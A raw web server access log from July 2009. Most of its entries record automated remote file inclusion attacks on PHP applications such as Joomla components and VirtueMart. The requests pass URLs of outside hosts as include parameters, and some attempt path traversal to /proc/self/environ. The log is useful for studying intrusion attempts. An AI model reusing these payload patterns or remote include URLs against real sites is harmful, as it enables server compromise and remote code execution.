60.43.229.5 - - [03/Jul/2009:12:52:24 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 296
89.6.30.231 - - [03/Jul/2009:12:55:04 +0000] "GET / HTTP/1.1" 200 125
89.6.30.231 - - [03/Jul/2009:12:55:04 +0000] "GET /favicon.ico HTTP/1.1" 404 288
89.6.30.231 - - [03/Jul/2009:12:55:04 +0000] "GET /favicon.ico HTTP/1.1" 404 288
213.171.225.234 - - [03/Jul/2009:12:55:56 +0000] "GET //2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 306
213.171.225.234 - - [03/Jul/2009:12:55:56 +0000] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 311
213.171.225.234 - - [03/Jul/2009:12:55:56 +0000] "GET /logs/access_log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 324
66.172.22.2 - - [03/Jul/2009:13:10:11 +0000] "GET //?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 125
66.172.22.2 - - [03/Jul/2009:13:10:11 +0000] "GET //?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 125
65.98.8.5 - - [03/Jul/2009:13:11:59 +0000] "GET /logs/access_log/errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 303
65.98.8.5 - - [03/Jul/2009:13:11:59 +0000] "GET /errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 287
65.98.8.5 - - [03/Jul/2009:13:11:59 +0000] "GET /logs/errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 292
65.98.8.5 - - [03/Jul/2009:13:12:07 +0000] "GET /logs/access_log/errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 303
65.98.8.5 - - [03/Jul/2009:13:12:07 +0000] "GET /errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 287
65.98.8.5 - - [03/Jul/2009:13:12:07 +0000] "GET /logs/errors.php?error=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 292
59.22.140.17 - - [03/Jul/2009:13:13:07 +0000] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 349
59.22.140.17 - - [03/Jul/2009:13:13:07 +0000] "GET /logs/access_log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 365
59.22.140.17 - - [03/Jul/2009:13:13:07 +0000] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 354
66.172.22.2 - - [03/Jul/2009:13:16:12 +0000] "GET //skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 302
66.172.22.2 - - [03/Jul/2009:13:16:17 +0000] "GET //skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 302
59.22.140.17 - - [03/Jul/2009:13:17:21 +0000] "GET /logs/access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 367
213.171.225.234 - - [03/Jul/2009:13:17:57 +0000] "GET /logs/access_log//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://fd.axl-jp.net//assets/images/id1.txt? HTTP/1.1" 404 322
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 318
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET //skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 302
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 307
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 318
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET //skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 302
66.172.22.2 - - [03/Jul/2009:13:21:20 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 307
198.64.149.93 - - [03/Jul/2009:13:21:35 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 307
198.64.149.93 - - [03/Jul/2009:13:21:35 +0000] "GET //skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 302
198.64.149.93 - - [03/Jul/2009:13:21:38 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 318
198.64.149.93 - - [03/Jul/2009:13:22:15 +0000] "GET //skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 302
198.64.149.93 - - [03/Jul/2009:13:22:15 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 307
198.64.149.93 - - [03/Jul/2009:13:22:20 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 318
206.196.125.113 - - [03/Jul/2009:13:24:27 +0000] "GET /atom.xml HTTP/1.1" 200 4103
198.64.149.93 - - [03/Jul/2009:13:26:23 +0000] "GET /logs//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 307
198.64.149.93 - - [03/Jul/2009:13:26:24 +0000] "GET /logs/access_log//skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 318
198.64.149.93 - - [03/Jul/2009:13:26:34 +0000] "GET //skin/zero_vote/login.php?dir=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 302
87.229.45.106 - - [03/Jul/2009:13:31:08 +0000] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 311
87.229.45.106 - - [03/Jul/2009:13:31:08 +0000] "GET /logs/access_log%20%20//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 324
87.229.45.106 - - [03/Jul/2009:13:31:08 +0000] "GET //bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 306
87.229.45.106 - - [03/Jul/2009:13:31:53 +0000] "GET //bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 306
87.229.45.106 - - [03/Jul/2009:13:31:53 +0000] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 311
87.229.45.106 - - [03/Jul/2009:13:31:54 +0000] "GET /logs/access_log%20%20//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 324
72.14.199.85 - - [03/Jul/2009:13:32:09 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
87.229.45.106 - - [03/Jul/2009:13:35:28 +0000] "GET /logs/access_log//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 322
125.251.147.130 - - [03/Jul/2009:13:40:07 +0000] "GET /logs/access_log//include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 311
125.251.147.130 - - [03/Jul/2009:13:40:07 +0000] "GET /logs//include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 300
125.251.147.130 - - [03/Jul/2009:13:40:07 +0000] "GET //include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 295
125.251.147.130 - - [03/Jul/2009:13:40:08 +0000] "GET /logs/access_log//include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 311
125.251.147.130 - - [03/Jul/2009:13:40:08 +0000] "GET /logs//include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 300
125.251.147.130 - - [03/Jul/2009:13:40:08 +0000] "GET //include/write.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 295
87.229.45.106 - - [03/Jul/2009:13:44:41 +0000] "GET /logs/access_log//bbs/skin/zero_vote/setup.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 322
207.57.79.26 - - [03/Jul/2009:13:49:50 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 344
207.57.79.26 - - [03/Jul/2009:13:49:50 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 328
207.57.79.26 - - [03/Jul/2009:13:49:50 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 333
207.57.79.26 - - [03/Jul/2009:13:54:19 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 344
207.57.79.26 - - [03/Jul/2009:13:54:19 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 328
207.57.79.26 - - [03/Jul/2009:13:54:19 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 333
208.80.195.36 - - [03/Jul/2009:14:13:53 +0000] "GET / HTTP/1.0" 200 125
211.245.23.158 - - [03/Jul/2009:14:22:32 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 328
211.245.23.158 - - [03/Jul/2009:14:22:32 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 344
211.245.23.158 - - [03/Jul/2009:14:22:32 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 333
211.245.23.158 - - [03/Jul/2009:14:24:03 +0000] "GET /logs/access_log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 345
59.22.140.17 - - [03/Jul/2009:14:26:55 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 317
59.22.140.17 - - [03/Jul/2009:14:26:55 +0000] "GET ///vwar/backup/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 301
59.22.140.17 - - [03/Jul/2009:14:26:55 +0000] "GET /logs///vwar/backup/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 306
72.14.199.85 - - [03/Jul/2009:14:32:18 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
69.65.10.238 - - [03/Jul/2009:14:36:18 +0000] "GET /logs//appserv/main.php?appserv_root=http://140.127.22.184/htaccess?? HTTP/1.1" 404 299
69.65.10.238 - - [03/Jul/2009:14:36:18 +0000] "GET /logs/access_log%20%20//appserv/main.php?appserv_root=http://140.127.22.184/htaccess?? HTTP/1.1" 404 312
69.65.10.238 - - [03/Jul/2009:14:36:18 +0000] "GET //appserv/main.php?appserv_root=http://140.127.22.184/htaccess?? HTTP/1.1" 404 294
87.229.45.106 - - [03/Jul/2009:14:38:48 +0000] "GET /config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 291
87.229.45.106 - - [03/Jul/2009:14:38:48 +0000] "GET /logs/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 296
87.229.45.106 - - [03/Jul/2009:14:38:48 +0000] "GET /logs/access_log%20%20/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 309
87.229.45.106 - - [03/Jul/2009:14:39:07 +0000] "GET /logs/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 296
87.229.45.106 - - [03/Jul/2009:14:39:07 +0000] "GET /config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 291
87.229.45.106 - - [03/Jul/2009:14:39:07 +0000] "GET /logs/access_log%20%20/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 309
87.229.45.106 - - [03/Jul/2009:14:39:21 +0000] "GET /logs/access_log/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
87.229.45.106 - - [03/Jul/2009:14:39:39 +0000] "GET /logs/access_log/config.inc.php?path_escape=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
69.65.10.238 - - [03/Jul/2009:14:41:07 +0000] "GET /logs/access_log//appserv/main.php?appserv_root=http://140.127.22.184/htaccess?? HTTP/1.1" 404 310
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET //errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 288
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET /logs/access_log//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 304
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET /logs//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 293
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET /logs//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 293
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET //errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 288
89.223.3.98 - - [03/Jul/2009:14:49:25 +0000] "GET /logs/access_log//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 304
89.223.3.98 - - [03/Jul/2009:14:53:58 +0000] "GET //errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 288
89.223.3.98 - - [03/Jul/2009:14:53:58 +0000] "GET /logs//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 293
89.223.3.98 - - [03/Jul/2009:14:53:58 +0000] "GET /logs/access_log//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 304
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET //errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 288
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET /logs//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 293
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET /logs/access_log%20%20//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 306
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET //errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 288
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET /logs/access_log%20%20//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 306
89.223.3.98 - - [03/Jul/2009:14:55:08 +0000] "GET /logs//errors.php?error=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 293
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /logs/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 296
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /logs/access_log%20%20/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 309
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /logs/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 296
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /logs/access_log%20%20/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 309
211.230.156.161 - - [03/Jul/2009:15:02:51 +0000] "GET /logs/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 296
211.230.156.161 - - [03/Jul/2009:15:02:52 +0000] "GET /logs/access_log%20%20/config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 309
211.230.156.161 - - [03/Jul/2009:15:02:52 +0000] "GET /config.inc.php?path_escape=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291
205.134.252.26 - - [03/Jul/2009:15:10:47 +0000] "GET //admin.php?_SERVER[DOCUMENT_ROOT]=http://www.oalcs.org/school/pages/about/about?? HTTP/1.1" 404 287
205.134.252.26 - - [03/Jul/2009:15:28:47 +0000] "GET /logs/access_log//admin.php?_SERVER[DOCUMENT_ROOT]=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 303
205.134.252.26 - - [03/Jul/2009:15:28:47 +0000] "GET //admin.php?_SERVER[DOCUMENT_ROOT]=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 287
205.134.252.26 - - [03/Jul/2009:15:28:47 +0000] "GET /logs//admin.php?_SERVER[DOCUMENT_ROOT]=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 292
59.22.140.17 - - [03/Jul/2009:15:40:25 +0000] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 125
59.22.140.17 - - [03/Jul/2009:15:40:25 +0000] "GET /logs/access_log//?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294
59.22.140.17 - - [03/Jul/2009:15:40:25 +0000] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 1884
59.22.140.17 - - [03/Jul/2009:15:46:17 +0000] "GET /logs/access_log%20%20//?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 296
72.14.199.85 - - [03/Jul/2009:15:49:10 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
220.231.126.252 - - [03/Jul/2009:15:54:39 +0000] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 314
220.231.126.252 - - [03/Jul/2009:15:54:43 +0000] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 319
220.231.126.252 - - [03/Jul/2009:15:54:43 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 332
220.231.126.252 - - [03/Jul/2009:15:55:07 +0000] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 319
220.231.126.252 - - [03/Jul/2009:15:55:07 +0000] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 314
220.231.126.252 - - [03/Jul/2009:15:55:07 +0000] "GET /logs/access_log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 330
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs/access_log//include/lib.inc.php?site_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 313
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET //include/lib.inc.php?site_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 297
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs//include/lib.inc.php?site_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 302
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs/access_log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 303
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 287
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 292
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs/access_log//include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 313
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET //include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297
91.195.124.16 - - [03/Jul/2009:16:01:05 +0000] "GET /logs//include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 302
91.195.124.16 - - [03/Jul/2009:16:01:06 +0000] "GET /logs//include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302
91.195.124.16 - - [03/Jul/2009:16:01:06 +0000] "GET //include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297
91.195.124.16 - - [03/Jul/2009:16:01:06 +0000] "GET /logs/access_log//include/lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313
123.143.98.5 - - [03/Jul/2009:16:09:09 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
123.143.98.5 - - [03/Jul/2009:16:09:09 +0000] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 302
123.143.98.5 - - [03/Jul/2009:16:09:09 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 320
123.143.98.5 - - [03/Jul/2009:16:09:22 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
123.143.98.5 - - [03/Jul/2009:16:09:22 +0000] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 302
123.143.98.5 - - [03/Jul/2009:16:09:22 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 320
61.78.62.84 - - [03/Jul/2009:16:10:14 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 307
61.78.62.84 - - [03/Jul/2009:16:10:14 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 318
61.78.62.84 - - [03/Jul/2009:16:10:14 +0000] "GET //skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 302
61.78.62.84 - - [03/Jul/2009:16:10:16 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 318
61.78.62.84 - - [03/Jul/2009:16:10:29 +0000] "GET //skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 302
61.78.62.84 - - [03/Jul/2009:16:10:29 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 307
91.121.89.135 - - [03/Jul/2009:16:11:00 +0000] "GET ///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 301
91.121.89.135 - - [03/Jul/2009:16:11:00 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 317
91.121.89.135 - - [03/Jul/2009:16:11:00 +0000] "GET /logs///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 306
123.143.98.5 - - [03/Jul/2009:16:14:45 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
125.248.150.52 - - [03/Jul/2009:16:15:08 +0000] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 302
125.248.150.52 - - [03/Jul/2009:16:15:08 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 320
125.248.150.52 - - [03/Jul/2009:16:15:08 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
123.143.98.5 - - [03/Jul/2009:16:17:26 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
125.248.150.52 - - [03/Jul/2009:16:18:26 +0000] "GET //skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 302
125.248.150.52 - - [03/Jul/2009:16:18:26 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 320
125.248.150.52 - - [03/Jul/2009:16:18:26 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 307
91.121.89.135 - - [03/Jul/2009:16:18:42 +0000] "GET /logs/access_log%20%20///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 319
